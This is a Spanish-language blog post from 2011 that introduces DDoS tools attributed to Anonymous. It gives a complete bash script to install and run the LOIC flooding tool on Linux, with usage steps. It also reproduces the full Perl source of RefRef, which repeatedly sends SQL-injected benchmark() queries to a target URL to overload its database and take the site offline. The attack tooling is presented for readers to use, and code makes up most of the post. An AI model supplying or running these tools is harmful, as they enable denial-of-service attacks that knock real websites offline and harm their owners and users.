domingo, 27 de noviembre de 2011

Ataques DDos

Bien, un ataque DDos es una negación de servicio que se efectua lanzando paquetes TCP, UDP o peticiones HTTP para hacer caer el servidor de destino. Los programas que voy a mencionar son los usados por el grupo Anonymous para dichos ataques. Uso esta referencia por ser una de las cosas mas comentadas en los blogs.

  LOIC



este programa es el que empezo a usar el grupo el cual se puede descargar desde AQUI

Encontre por internet un script el cual hace que no haga falta emularlo con wine, os pego el codigo aqui abajo, solo lo tenemos que guardar como .sh (bash):


#!/bin/bash
# Copyfuck © 2010 q
#
# This script installs, updates and runs LOIC on Linux.
#
# Supported distributions:
# * Ubuntu / Debian
# * Fedora
#
# Usage: bash install_loic.bash


###COLOURS###


txt_bld=$(tput bold)
bld_red=${txt_bld}$(tput setaf 1)
col_rst=$(tput sgr0)


###GLOBALS###


GIT_REPO=https://github.com/NewEraCracker/LOIC.git
GIT_BRANCH=master


###FUNCTIONS###


ensure_git() #Checks if git is installed, Tries to install it if not
{
type -P git &>/dev/null ||
{
echo -e "${bld_red}Git not found! Attempting to install...${col_rst}"
if [ -f /etc/lsb-release ] ; then
sudo apt-get install git
elif [ -f /etc/fedora-release ] ; then
sudo yum install git
elif [ -f /etc/debian_version ] ; then
sudo apt-get install git
fi
}
}


is_loic_git()
{
[[ -d .git ]] && grep -q LOIC .git/config
}


is_loic() {
is_loic_git ||
{
[[ -d LOIC ]] && cd LOIC && is_loic_git
}
}


get_loic() {
ensure_git
if ! is_loic ; then
git init
git clone $GIT_REPO -b $GIT_BRANCH
fi
}


compile_loic() {
get_loic
if ! is_loic ; then
echo -e "${bld_red}Error: You are not in a LOIC repository.${col_rst}"
exit 1
else
if [ -f /etc/lsb-release ] ; then
echo -e "${bld_red}monodevelop and liblog4net-cil-dev not found! Attempting to install...${col_rst}"
sudo apt-get install monodevelop liblog4net-cil-dev
elif [ -f /etc/fedora-release ] ; then
echo -e "${bld_red}mono-basic, mono-devel, monodevelop and mono-tools not found! Attempting to install...${col_rst}"
sudo yum install mono-basic mono-devel monodevelop mono-tools
elif [ -f /etc/debian_version ] ; then
echo -e "${bld_red}monodevelop and liblog4net-cil-dev not found! Attempting to install...${col_rst}"
sudo apt-get install monodevelop liblog4net-cil-dev
fi
fi
mdtool build
}


run_loic() {
is_loic
if [[ ! -e bin/Debug/LOIC.exe ]] ; then
compile_loic
fi
type -P mono &>/dev/null ||
{
echo -e "${bld_red}mono-runtime not found! Attempting to install...${col_rst}"
if [ -f /etc/lsb-release ] ; then
sudo apt-get install mono-runtime
elif [ -f /etc/fedora-release ] ; then
sudo yum install mono-runtime
elif [ -f /etc/debian_version ] ; then
sudo apt-get install mono-runtime
fi
}
mono bin/Debug/LOIC.exe
}


update_loic() {
ensure_git
if is_loic ; then
git pull --rebase
compile_loic
else
echo -e "${bld_red}Error: You are not in a LOIC repository.${col_rst}"
fi
}




case $1 in
install)
compile_loic
;;
update)
update_loic
;;
run)
run_loic
;;
*)
echo "Usage: $0 "
;;
esac


una vez creado el archivo solo tendremos que cambiarle los permisos con este comando:

chmod 777 nombredelscript.sh


lo instalamos de poniendo este comando:

./nombredelscript.sh install

despues nos creara un archivo llamado LOIC, y para ejecutarlo escribimos:

./nombredelscript.sh run




REFREF


Esta herramienta ha sido desarollada por Anonymous y se presta a ser mejor que LOIC siendo catalogada como la herramienta definitiva para ellos.


Necesitamos tener Perl instalado para poder correr el script.

Os pongo el codigo por si alguien lo quiere revisar o echarle un vistazo por curiosidad:




#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef http://hackingalert.blogspot.com == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef http://hackingalert.blogspot.com == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?


os dejo un video demostrativo de esta utilidad:




No hay comentarios:

Publicar un comentario